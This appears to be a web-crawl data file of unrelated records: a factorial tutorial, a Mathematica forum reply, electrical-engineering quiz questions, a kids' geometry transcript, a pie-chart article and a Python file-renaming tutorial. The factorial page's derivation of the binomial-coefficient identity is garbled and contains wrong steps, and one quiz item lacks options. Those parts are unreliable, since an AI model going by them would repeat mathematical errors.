{"ft_lang_label":"__label__zh","ft_lang_prob":0.85119927,"math_prob":0.98458874,"size":516,"snap":"2022-40-2023-06","text_gpt3_token_len":323,"char_repetition_ratio":0.115234375,"word_repetition_ratio":0.0,"special_character_ratio":0.19186047,"punctuation_ratio":0.08695652,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9878279,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-29T15:11:40Z\",\"WARC-Record-ID\":\"<urn:uuid:b6b7ae99-72a5-4620-a6b4-d0af70c4d354>\",\"Content-Length\":\"29352\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:21eb649d-6d7f-4786-b374-eab1efe20a25>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb7b6583-e33f-4211-89b3-f012aeb0bac7>\",\"WARC-IP-Address\":\"172.67.210.246\",\"WARC-Target-URI\":\"https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0102490\",\"WARC-Payload-Digest\":\"sha1:OAE6IEX43PGV4EIBDI5GM5CEHHDJGHXO\",\"WARC-Block-Digest\":\"sha1:OA35PM3UY2LGHDSXV66R4I2HXGOPVBGW\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499744.74_warc_CC-MAIN-20230129144110-20230129174110-00448.warc.gz\"}"}
https://www.digitmath.com/factorial-basics.html
[ "", null, "", null, "", null, "# Factorials", null, "", null, "## Basics of Factorials\n\nA Factorial is the number of unique combinations of the elements of a set so that each combination of elements represents a unique permutation of that set’s elements.\n\nLet’s look at a few examples:\n(The “!” after the integer tells us it is a Factorial)\n\n0! = 1\n1! = 1 = 1\n2! = 2 × 1 = 2\n3! = 3 × 2 × 1 = 6\n4! = 4 × 3 × 2 × 1 = 24\nn! = n (n − 1) (n − 2)… 3 × 2 × 1\n\nYes, 0! = 1. This is because an empty set, having no elements, can be ordered by (organized) only as { }, there is no other order for an empty set.\n\nThe Permutations of 0! is 1: { }\nThe permutations of 1! is 1: {1}\nThe permutations of 2! is 2: {1,2} {2,1}\nThe permutations of 3! is 6: {3,2,1} {1,2,3} {2,1,3} {2,3,1} {3,1,2} {1,3,2}\n\nIt is easy to see that as the integer of the Factorial becomes larger the complexity to determine the unique combinations, as permutations of set elements, quickly nears impossible…\n\n5! = 5 × 4 × 3 × 2 × 1 = 120\n6! = 6 × 5 × 4 × 3 × 2 × 1 = 720\n7! = 5,040\n8! = 40,320\n9! = 362,880\n10! = 10 × 9 × 8 × 7 × 6 × 5 × 4 × 3 × 2 × 1 = 3,628,800\n\nand observe:\n3! = 6\n4! = 3! × 4 = 6 × 4 = 24\n5! = 4! × 5 = 24 × 5 = 120\n6! = 5! × 6 = 120 × 6 = 720\n\nFrom this observation we can infer that a Factorial, (n + 1)! , is equal to n! (n + 1); Where n! is read “n factorial”. That is, the permutations of the next Factorial can always be determined by multiplying the permutations of the current Factorial, n!, by the next integer increment of the current Factorial. A formal math definition of a Factorial can now be given as:\n\n(n + 1)! = n! (n +1)\n\nA Factorial is an integer product:\nn! = n (n − 1) (n − 2) … 3 × 2 × 1\nUsing 6! to equate factors to the equation n!:\n6! = 6 × 5 × 4 × 3 × 2 × 1 = 720\nn = 6\nn − 1 = 5\nn − 2 = 4\nn − 3 = 3\nn − 4 = 2\nn − 5 = 1\n\nThis is multiplication to determine the number of permutations, unique combinations, for a given Factorial. This being said, then one Factorial can be divided by another Factorial, that is, division and multiplication are reciprocal operations. Indeed, Factorials can be divided to determine the difference of their permutations with the stipulation that for any n! / i! , 0 ≤ i ≤ n.\n\nLet’s divide 10! by 6! :\n10! / 6! =\n(10 × 9 × 8 × 7 × 6 × 5 × 4 × 3 × 2 × 1) / (6 × 5 × 4 × 3 × 2 × 1) =\n(10 × 9 × 8 × 7 × 6 × 5 × 4 × 3 × 2 × 1) / (6 × 5 × 4 × 3 × 2 × 1) =\n10 × 9 × 8 × 7 = 5,040\n… we observe that the fraction can be reduced.\n\nIf we already know the permutation values, the numerator and denominator, of the factorial division:\n10! = 3,628,800\n6! = 720\n3,628,800 / 720 = 5,040\n10! / 6! = 5,040\n\nIf we do not know the permutation values of the numerator or denominator factorials of the division:\n20! / 18! 2! =\n(The numerator is determined by denominator 18! canceling, or reducing, the first 18 integer digits of the numerator 20! to 1/1, the remaining values not reduced, are greater than 18. The integers remaining are 19 and 20)\n20 × 19 / 2! =\n20 × 19 / 2! =\n(Evaluating 2!; 2! = 2)\n20 × 19 / 2 =\n10 × 19 / 1 = 190\n\n## Quotients of Factorials\n\nA special symbol with a special definition to find quotients of factorials:\n\n(\n\nn\n\ni\n\n)\n\n“This special math symbol does not state n! is to be divided by i!”\n\nThe definition is\n\n(\n\nn\n\ni\n\n)\n\n= n! / (i! (n − i)!)\n\ni and n are integers where 0 ≤ i ≤ n\n\nIf asked to find the quotient of:\n\n(\n\n7\n\n4\n\n)\n\n= n! / (i! (n − i)!)\n= 7! / (4! (7 − 4)!) = 7! / (4! 3!) = (7 × 6 × 5 × 4 × 3 × 2 × 1) / ((4 × 3 × 2 × 1) (3 × 2 × 1))\n= (7 × 6 × 5) / (3 × 2 × 1) = 210 / 6 = 35\n\nWhen n = 7 and i = 4 the resulting factorial equation is 7! / (4! 3!).\nLet’s try n = 7 and i =3…\n\n(\n\n7\n\n3\n\n)\n\n= 7! / (3! (7 − 3)!) = 7! / (3! 4!) = 35\n\nThis works for any values of n and i to find quotients of factorials.\n\n(\n\n8\n\n5\n\n)\n\n= n! / (i! (n − i)!)\n= 8! / (5! (8 − 5)!) = 8! / (5! 3!) = (8 × 7 × 6 × 5 × 4 × 3 × 2 × 1) / ((5 × 4 × 3 × 2 × 1) (3 × 2 × 1))\n= (8 × 7 × 6) / (3 × 2 × 1) = 336 / 6 = 56\n\n(\n\n8\n\n3\n\n)\n\n= 8! / (3! (8 − 3)!) = 8! / (3! 5!) = 56\n\nThis behavior to determine the denominator for factorial division can be described by:\n\n(\n\nn\n\ni\n\n)\n\n=\n\n(\n\nn\n\nn − i\n\n)\n\n(\n\n9\n\n7\n\n)\n\n=\n\n(\n\n9\n\n9 − 7\n\n)\n\n=\n\n(\n\n9\n\n2\n\n)\n\nThe following math shows us why:\n\n(\n\nn\n\ni\n\n)\n\n=\n\n(\n\nn\n\nn − i\n\n)\n\nObserve that\n\n(\n\nn\n\ni\n\n)\n\n= n! / (i! (n − i)!)\n\nand\n\n(\n\nn\n\nn i\n\n)\n\n= n! / ( n! (i! (n − i)!)\n= n! / ( (n i)! (n (n − i))! ) = n! / ( (n − i)! i! )\n\nNote that [n − (n − i)]! = [n − n + i]! = i!\n\nthus\n\n(\n\nn\n\nn − i\n\n)\n\n= n! / (i! (n − i)!) =\n\n(\n\nn\n\ni\n\n)" ]
[ null, "https://www.digitmath.com/image-files/xwp948f12a2_0a_1a.jpg.pagespeed.ic.NuYSHvbEvD.jpg", null, "https://www.digitmath.com/image-files/xwp7bcfabb2_1a.png.pagespeed.ic.Nyd46ZAI-a.png", null, "https://www.digitmath.com/image-files/xmath-scroll.png.pagespeed.ic.qy1Y3XGvKS.png", null, "https://www.digitmath.com/image-files/xwp00f9f6c3_1a.png.pagespeed.ic.GXcST6qyF-.png", null, "https://www.digitmath.com/image-files/xwp47b89e40_1a.png.pagespeed.ic.3v8BI4i8G4.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7805257,"math_prob":0.9999869,"size":4311,"snap":"2022-27-2022-33","text_gpt3_token_len":1797,"char_repetition_ratio":0.15834688,"word_repetition_ratio":0.21308577,"special_character_ratio":0.5126421,"punctuation_ratio":0.18557692,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999528,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-06T19:00:17Z\",\"WARC-Record-ID\":\"<urn:uuid:94c65cb0-47c3-4213-a6b0-a96d8d244b96>\",\"Content-Length\":\"40341\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d2eba66a-ee10-44ab-b160-89fa84424892>\",\"WARC-Concurrent-To\":\"<urn:uuid:9c964865-f62a-4b2c-8173-0014f24af032>\",\"WARC-IP-Address\":\"173.247.218.77\",\"WARC-Target-URI\":\"https://www.digitmath.com/factorial-basics.html\",\"WARC-Payload-Digest\":\"sha1:5NQGTK63CPFJIBFMZLTHTYIBU2E2EMW3\",\"WARC-Block-Digest\":\"sha1:UQJF6B2CYNLXEUUYOYIM5WFIVIB5MYIW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104676086.90_warc_CC-MAIN-20220706182237-20220706212237-00094.warc.gz\"}"}
https://forums.wolfram.com/mathgroup/archive/2009/May/msg00195.html
[ "", null, "", null, "", null, "", null, "", null, "", null, "", null, "Re: defining consecutive variables\n\n• To: mathgroup at smc.vnet.net\n• Subject: [mg99442] Re: defining consecutive variables\n• From: Szabolcs <szhorvat at gmail.com>\n• Date: Wed, 6 May 2009 05:20:24 -0400 (EDT)\n• References: <gtp199\\$joi\\[email protected]>\n\n```On May 5, 12:35 pm, Jason <jbig... at uoregon.edu> wrote:\n> I have a code where I need to define a large number of variables as matri=\nces, called q1,q2,q3......qn. I'd like to be able to define them all withou=\nt writing out n assignment lines, so a Do loop seems appropriate to me but =\nI don't know how to assign sequential variable names. This gets the job don=\ne but it is really ugly IMO\n>\n> f[x_] := Table[x RandomReal[], {n, 5}, {np, 5}](*for example*)\n>\n> Do[ToExpression[\"q\" <> ToString[n] <> \"=f[n]\"], {n, 0, 40}]\n>\n> at the end of which I have 41 matrices which I can call as q0,q1, etc. Is=\nthis the best way to accomplish this task?\n>\n\nConsider using expressions of the form q, q, etc. Are you doing\nanything with these variables that requires them to be atomic symbols\n(instead of compound expressions like q)?\n\nDo[q[i] = f[i], {i,0,40}]\n\nAlso, do you really need all these matrices to have a unique name? It\nsounds like you might need to iterate over them several times (or\nperform identical calculations with all of them). Couldn't you just\nuse a simple list of matrices instead?\n\n```\n\n• Prev by Date: Re: Do some definite integral calculation.\n• Next by Date: Re: Reading csv with ;\n• Previous by thread: Re: defining consecutive variables\n• Next by thread: Re: defining consecutive variables" ]
[ null, "https://forums.wolfram.com/mathgroup/images/head_mathgroup.gif", null, "https://forums.wolfram.com/mathgroup/images/head_archive.gif", null, "https://forums.wolfram.com/mathgroup/images/numbers/2.gif", null, "https://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "https://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "https://forums.wolfram.com/mathgroup/images/numbers/9.gif", null, "https://forums.wolfram.com/mathgroup/images/search_archive.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9054975,"math_prob":0.8707101,"size":1353,"snap":"2023-40-2023-50","text_gpt3_token_len":393,"char_repetition_ratio":0.088954784,"word_repetition_ratio":0.00862069,"special_character_ratio":0.31707317,"punctuation_ratio":0.18892509,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9642835,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-29T20:43:02Z\",\"WARC-Record-ID\":\"<urn:uuid:5c037b35-3b58-412d-9c82-a464d54bb834>\",\"Content-Length\":\"44815\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:db4dd272-8681-4193-aaa6-3e1f169096e7>\",\"WARC-Concurrent-To\":\"<urn:uuid:d26dbcdd-ce3d-4e4e-b207-abce9ff195b6>\",\"WARC-IP-Address\":\"140.177.205.73\",\"WARC-Target-URI\":\"https://forums.wolfram.com/mathgroup/archive/2009/May/msg00195.html\",\"WARC-Payload-Digest\":\"sha1:2IN3443HIOCNWIJ7C2DRSJ5LIXMFLY2Q\",\"WARC-Block-Digest\":\"sha1:UA7IT5SIFA7FM3GBT6IQDXSIQJ5BSUE7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510528.86_warc_CC-MAIN-20230929190403-20230929220403-00428.warc.gz\"}"}
https://www.coep.in/electrical-engineering-mcq/network-analysis-1/
[ "# Network Analysis 1\n\nElectrical Engineering MCQ Question Papers: Campus Placement\n\nSubject: Network Analysis 1\n\nPart 1: List for questions and answers of Network Analysis\n\nQ1. An RLC series circuit is under damped. To make it over damped, the value of R\n\na) Has to be increased\n\nb) Has to be decreased\n\nc) Has to be increased to infinity\n\nd) Has to be reduced to zero\n\nQ2. Henry is equivalent to\n\na) Volts/Ampere\n\nb) Weber/Volt\n\nc) Weber/Ampere\n\nd) Weber/Ampere2\n\nQ3. In a minimum function\n\na) The degree of numerator and denominator are equal\n\nb) The degree of numerator and denominator are unequal\n\nc) The degree of numerator is one more than degree of denominator\n\nd) The degree of numerator is one less than degree of denominator\n\nQ4. For a transmission line open circuit and short circuit impedances are 20ohm and 5 ohm. Then characteristic impedance is\n\na) 100 ohm\n\nb) 50 ohm\n\nc) 25 ohm\n\nd) 10 ohm\n\nQ5. The drift velocity of electrons is\n\na) Very small as compared to speed of light\n\nb) Equal to speed of light\n\nc) Almost equal to speed of light\n\nd) Half the speed of light\n\nQ6. Wave A = 100 sin wt and wave B = 100 cos wt. Then\n\na) Rms values of the two waves are equal\n\nb) Rms values of A is more than that of B\n\nc) Rms values of A is less than that of B\n\nd) Rms values of the two waves may or may not be equal\n\nQ7. A capacitor stores 0.15C at 5 V. Its capacitance is\n\na) 0.75 F\n\nb) 0.75 uF\n\nc) 0.03 F\n\nd) 0.03 uF\n\nQ8. A 0.5 uF capacitor is connected across a 10 V battery. After a long time, the circuit current and voltage across capacitor will be\n\na) 0.5 A and 0 V\n\nb) 0 A and 10 V\n\nc) 20 A and 5 V\n\nd) 0.05 A and 5 V\n\nQ9. The synthesis of minimum function was suggested by\n\na) O’Brune\n\nb) R. Richards\n\nc) Bott and Duffin\n\nd) None of the above\n\nQ10 .Which of the following is correct for a driving point functions?\n\na) The real parts of all poles must be negative\n\nb) The real parts of all poles and zeros must be negative\n\nc) The real parts of all poles and zeros must be negative or zero\n\nd) The real parts of all zeros must be negative\n\nQ11. In an RC series circuit R = 100 ohm and XC = 10 ohm. In this circuit\n\na) The current and voltage are in phase\n\nd) The current lags the voltage by about 6 degree\n\nQ12. The impedance of an RC series circuit is 12 ohm at f= 50 Hz. At f= 200 Hz, the impedance will be\n\na) More than 12\n\nb) Less than 3\n\nc) More than 3 ohm but less than 12 ohm\n\nd) More than 12 ohm but less than 24 ohm\n\nQ13. A current is flowing through a conductor with non-uniform area of cross-section. Then\n\na) Current will be different at different cross-sections\n\nb) Current will be the same at all the cross-sections\n\nc) Current will be different but current density will be same at all the cross-sections\n\nd) Current will be the same but current density will be different at different crosssections\n\nQ14. The electrical energy required to heat a bucket of water to a certain temperature is 2 kWh. If heat losses, are 25%, the energy input is\n\na) 2.67 kWh\n\nb) 3 kWh\n\nc) 2.5 kWh\n\nd) 3.5 kWh\n\nQ15. The current rating of a cable depends on\n\na) Length of cable\n\nb) Diameter of cable\n\nc) Both length and diameter of cable\n\nd) None of the above\n\nQ16. In an ac circuit, the maximum and minimum values of power factor can be\n\na) 2 and 0\n\nb) 1 and 0\n\nc) 0 and -1\n\nd) 1 and -1\n\nQ17. A two branch parallel circuit has a 20 ohm resistance and 1 H inductance in one branch and a 100 uF capacitor in the second branch. It is fed from 100 V ac supply, at resonance, the input impedance of the circuit is\n\na) 500 ohm\n\nb) 50 ohm\n\nc) 20 ohm\n\nd) 5 ohm\n\nQ18. As compared to the number of network elements in Brune synthesis, the number of network elements Bott-and Duffin in realization is\n\na) More\n\nb) Less\n\nc) Equal\n\nd) Any of the above\n\nQ19. A sinusoidal voltage has peak to peak value of 100 V. The rms value is\n\na) 50 V\n\nb) 70.7 V\n\nc) 35.35 V\n\nd) 141.41 V\n\nQ20. A capacitor is needed for an ac circuit of 230 V, 50 Hz the peak voltage rating of the capacitor should be\n\na) 230 V\n\nb) 0.5 x 230 V\n\nc) 2 x 230V\n\nd) 230/2V\n\nPart 1: List for questions and answers of Network Analysis" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74492544,"math_prob":0.99216205,"size":4359,"snap":"2021-43-2021-49","text_gpt3_token_len":1405,"char_repetition_ratio":0.12950632,"word_repetition_ratio":0.079865016,"special_character_ratio":0.30098647,"punctuation_ratio":0.100196466,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9950918,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-22T21:45:51Z\",\"WARC-Record-ID\":\"<urn:uuid:443da96e-1624-4b34-ae3f-d7dc1eb55508>\",\"Content-Length\":\"85404\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:801bb22f-a753-4a08-af60-abe7b7058b2d>\",\"WARC-Concurrent-To\":\"<urn:uuid:769c5c34-0e5c-46b7-936b-d34265d0c03a>\",\"WARC-IP-Address\":\"104.21.5.242\",\"WARC-Target-URI\":\"https://www.coep.in/electrical-engineering-mcq/network-analysis-1/\",\"WARC-Payload-Digest\":\"sha1:FAZU66WXCQTT7M7KEEV36UUGD4S7RMOS\",\"WARC-Block-Digest\":\"sha1:GSY7YMBXUD6Q6AVY5FCQFKK4JPV5HES7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585522.78_warc_CC-MAIN-20211022212051-20211023002051-00471.warc.gz\"}"}
https://h0w.is/how-is-a/cylinder-and-a-cone-different/
[ "## 3-d shapes – Cone and Cylinder | Math | Grade-1,2 | TutWay |\n\nhi kids today we will learn about two\n\nshapes cone and cylinder let's first\n\nstart with a cone this is a cone it has\n\nonly one vertex which is the tip of the\n\ncone it has only one edge which is round\n\nin shape now let's see its faces one of\n\nthe faces is round shaped on its bottom\n\nthe other face is curved surface of the\n\ncone that wraps around it\n\ngood try to find out things of this\n\nshape in your house let me show you a\n\nfew yeah these are a few examples of\n\ncone shaped objects so we have learnt\n\nthat a cone is a 3d object with one\n\nvertex one edge and two faces good now\n\nlet's learn another shape that is a\n\ncylinder this is a cylinder now let's\n\nfigure out its vertices oops it has no\n\nvertex now let's figure out its edges it\n\nhas two edges one edge is its circle on\n\nthe top the other one is the circle on\n\nthe bottom now let's figure out its\n\nfaces it has three faces one face is\n\nround shaped on the top\n\nsecond one is the curved surface that\n\nwraps around it third one is also the\n\nround shaped face on the other side of\n\nthe curved surface can you see that oh\n\nwow\n\nnow let's see some cylinder shaped\n\nthings in our house yeah these are some\n\nof the cylinders shape objects we have\n\nin our house you must be familiar with\n\nthem hey don't forget we have learned\n\ncylinder is a 3d object with two edges\n\nand three faces and no vertex good now\n\ngo ahead and take a quiz to see your\n\nprogress\n\nbye bye" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9594399,"math_prob":0.89525974,"size":1376,"snap":"2021-04-2021-17","text_gpt3_token_len":339,"char_repetition_ratio":0.13119534,"word_repetition_ratio":0.024911031,"special_character_ratio":0.21366279,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95359313,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-12T20:52:51Z\",\"WARC-Record-ID\":\"<urn:uuid:de786e36-fd3f-4503-9e74-e9eb4f42b978>\",\"Content-Length\":\"30201\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4081a0c0-1f5e-4f74-be14-2c9a38299a10>\",\"WARC-Concurrent-To\":\"<urn:uuid:698bf0be-a4bf-4c12-a1da-061b74e49ad3>\",\"WARC-IP-Address\":\"68.183.16.183\",\"WARC-Target-URI\":\"https://h0w.is/how-is-a/cylinder-and-a-cone-different/\",\"WARC-Payload-Digest\":\"sha1:PFHCIAD4QB6PMR3NPQ5ORXPRHQR6ENEF\",\"WARC-Block-Digest\":\"sha1:5SHX7NVJTHFMA4JPDE7Q7KLTXBAENGRZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038069133.25_warc_CC-MAIN-20210412175257-20210412205257-00293.warc.gz\"}"}
https://templatesz234.com/pie-chart-diagram-worksheet/
[ "# Pie Chart Diagram Worksheet: A Comprehensive Guide\n\nWednesday, September 27th 2023. | Chart Templates\n\n## Introduction\n\nA pie chart is a circular statistical graphic that is divided into slices to illustrate numerical proportions. It is an effective tool for visualizing data and conveying information in a concise and easily understandable format. In this article, we will discuss the importance of using pie chart diagram worksheets, how to create them, and provide you with some sample worksheets to get you started.\n\n## Why Use Pie Chart Diagram Worksheets?\n\nPie chart diagram worksheets are incredibly useful for various reasons:\n\n1. Data Visualization: Pie charts allow you to represent complex data sets in a visually appealing and easily understandable format. They provide a clear representation of proportions and make it easier to identify patterns and trends.\n\n2. Comparison: Pie charts enable you to compare the proportions of different categories or data sets. By visually representing the data, you can quickly identify which categories are dominant or have the largest share.\n\n3. Communication: Pie chart diagram worksheets are an effective way to communicate information to others. They are easy to interpret and can convey complex data in a simplified manner, making it accessible to a wider audience.\n\n## Creating a Pie Chart Diagram Worksheet\n\nTo create a pie chart diagram worksheet, follow these steps:\n\n1. Gather Data: Collect the data you want to represent in your pie chart. Ensure that the data is accurate and relevant to the topic you are discussing.\n\n2. Determine Categories: Identify the different categories or data sets that you want to represent in your pie chart. Each category will be represented by a separate slice of the pie.\n\n3. Calculate Percentages: Calculate the percentage or proportion of each category in relation to the total data set. This will determine the size of each slice in the pie chart.\n\n4. Draw the Chart: Use a charting tool or software to create the pie chart. Input the data values and labels for each category to generate the chart.\n\n5. Add Labels and Legend: Label each slice with the corresponding category or data set. Include a legend to provide additional information about the chart.\n\n6. Customize the Chart: Customize the colors, fonts, and other visual elements of the chart to enhance its appearance and make it visually appealing.\n\n7. Review and Edit: Review the completed pie chart diagram worksheet for accuracy and clarity. Make any necessary edits or adjustments before finalizing.\n\n## Sample Pie Chart Diagram Worksheets\n\nHere are five sample pie chart diagram worksheets to help you understand how they can be used:\n\n1. Pie Chart Worksheet: Population Distribution by Age Group\n\n2. Pie Chart Worksheet: Budget Allocation for a Business\n\n3. Pie Chart Worksheet: Percentage of Students Enrolled in Various Subjects\n\n4. Pie Chart Worksheet: Distribution of Sales by Product Category\n\n5. Pie Chart Worksheet: Energy Consumption by Source\n\n1. What is a pie chart diagram worksheet?\n\nA pie chart diagram worksheet is a visual representation of data divided into slices to illustrate numerical proportions.\n\n2. How can pie charts benefit data visualization?\n\nPie charts provide a clear representation of proportions and make it easier to identify patterns and trends in the data.\n\n3. How do I create a pie chart diagram worksheet?\n\nTo create a pie chart diagram worksheet, gather data, determine categories, calculate percentages, draw the chart, add labels and legends, customize the chart, and review/edit before finalizing.\n\n4. Can I customize the appearance of my pie chart?\n\nYes, you can customize the colors, fonts, and other visual elements of the chart to enhance its appearance and make it visually appealing.\n\n5. How can I effectively communicate information using pie chart diagram worksheets?\n\nPie chart diagram worksheets are an effective way to communicate information by simplifying complex data into an easily understandable format, making it accessible to a wider audience.\n\n## Conclusion\n\nPie chart diagram worksheets are an invaluable tool for visualizing and communicating data effectively. By following the steps outlined in this article, you can create informative and visually appealing pie chart diagram worksheets. Remember to gather accurate data, determine categories, calculate percentages, and customize the chart to enhance its appearance. Start using pie chart diagram worksheets today to present your data in a clear and engaging manner.\n\n### Tags:\n\nPie chart, Data visualization, Worksheet, Data representation, Data analysis, Pie chart diagram, Charting tool, Visual communication, Proportions, Data sets\n\ntags: , ," ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81225115,"math_prob":0.76483655,"size":4634,"snap":"2023-40-2023-50","text_gpt3_token_len":857,"char_repetition_ratio":0.17948164,"word_repetition_ratio":0.13769124,"special_character_ratio":0.18429004,"punctuation_ratio":0.13085234,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9623399,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-11T03:17:11Z\",\"WARC-Record-ID\":\"<urn:uuid:e229ad75-349d-4810-a097-0dec455731fa>\",\"Content-Length\":\"47284\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:565b1a8e-f4a7-4231-b0ba-e62d6019cf5d>\",\"WARC-Concurrent-To\":\"<urn:uuid:c2043c12-80b6-4ee3-8801-5b3eb1d5946f>\",\"WARC-IP-Address\":\"107.191.111.63\",\"WARC-Target-URI\":\"https://templatesz234.com/pie-chart-diagram-worksheet/\",\"WARC-Payload-Digest\":\"sha1:6NFWSJB2SOVQKI6IHSRXSYOV4I6DTHYU\",\"WARC-Block-Digest\":\"sha1:IV2E7JQUE4WRGH4JABJEVHPD3L2KCCGM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679103464.86_warc_CC-MAIN-20231211013452-20231211043452-00773.warc.gz\"}"}
https://ithelp.ithome.com.tw/articles/10229795?sc=rss.qu
[ "#", null, "3\n\n## python批量讀取資料夾檔案、修改檔案\n\npython中有好用的`os`模組,\n\n# 使用教學\n\n## 匯入os模組\n\n``````import os\n``````\n\n## 一、批量修改檔名\n\n``````# 函數功能: 在指定path路徑下,將該層檔案及資料夾名稱前加上prefix字串\ndef batch_rename(path, prefix):\nfor fname in os.listdir(path):\nnew_fname = prefix+fname\nos.rename(os.path.join(path, fname), os.path.join(path, new_fname))\n``````\n\n## 二、批量顯示檔名\n\n``````# 函數功能: 顯示指定路徑下,該層的檔案及資料夾名稱\ndef batch_showname(path):\nfor fname in os.listdir(path):\nprint(os.path.join(path, fname))\n``````\n\n## 三、遞迴顯示所有檔名\n\n``````# 函數功能: 遞迴顯示指定路徑下的所有檔案及資料夾名稱\ndef find_dir(path):\nfor fd in os.listdir(path):\nfull_path=os.path.join(path,fd)\nif os.path.isdir(full_path):\nprint('資料夾:',full_path)\nfind_dir(full_path)\nelse:\nprint('檔案:',full_path)\n``````\n\n# 使用範例", null, "``````import os\ndef find_dir(path):\n# 函數功能: 遞迴顯示指定路徑下的所有檔案及資料夾名稱\nfor fd in os.listdir(path):\nfull_path=os.path.join(path,fd)\nif os.path.isdir(full_path):\nprint('資料夾:',full_path)\nfind_dir(full_path)\nelse:\nprint('檔案:',full_path)\n\npath=\"./\" #指向當前資料夾的路徑\nfind_dir(path)\n``````\n\n(方便之後將檔案放在同一個資料夾做排序)\n\n``````import os\ndef batch_rename(path, prefix):\n# 函數功能: 在指定path路徑下,將該層檔案及資料夾名稱前加上prefix字串\nfor fname in os.listdir(path):\nnew_fname = prefix+fname\nos.rename(os.path.join(path, fname), os.path.join(path, new_fname))\n\nbatch_rename(\"./歌單1\",'a')\nbatch_rename(\"./歌單2\",'b')\nbatch_rename(\"./歌單3\",'c')\n``````\n\n# 附上完整程式碼供參考\n\n``````import os\ndef batch_rename(path, prefix):\n# 函數功能: 在指定path路徑下,將該層檔案及資料夾名稱前加上prefix字串\nfor fname in os.listdir(path):\nnew_fname = prefix+fname\nos.rename(os.path.join(path, fname), os.path.join(path, new_fname))\n\ndef batch_showname(path):\n# 函數功能: 顯示指定路徑下,該層的檔案及資料夾名稱\nfor fname in os.listdir(path):\nprint(os.path.join(path, fname))\n\ndef find_dir(path):\n# 函數功能: 遞迴顯示指定路徑下的所有檔案及資料夾名稱\nfor fd in os.listdir(path):\nfull_path=os.path.join(path,fd)\nif os.path.isdir(full_path):\nprint('資料夾:',full_path)\nfind_dir(full_path)\nelse:\nprint('檔案:',full_path)\n\npath=\"./\" #指向當前資料夾的路徑\nfind_dir(path)\n``````" ]
[ null, "https://ithelp.ithome.com.tw/storage/image/logo.svg", null, "https://ithelp.ithome.com.tw/upload/images/20200123/20117114xLnGtxWTLn.png", null ]
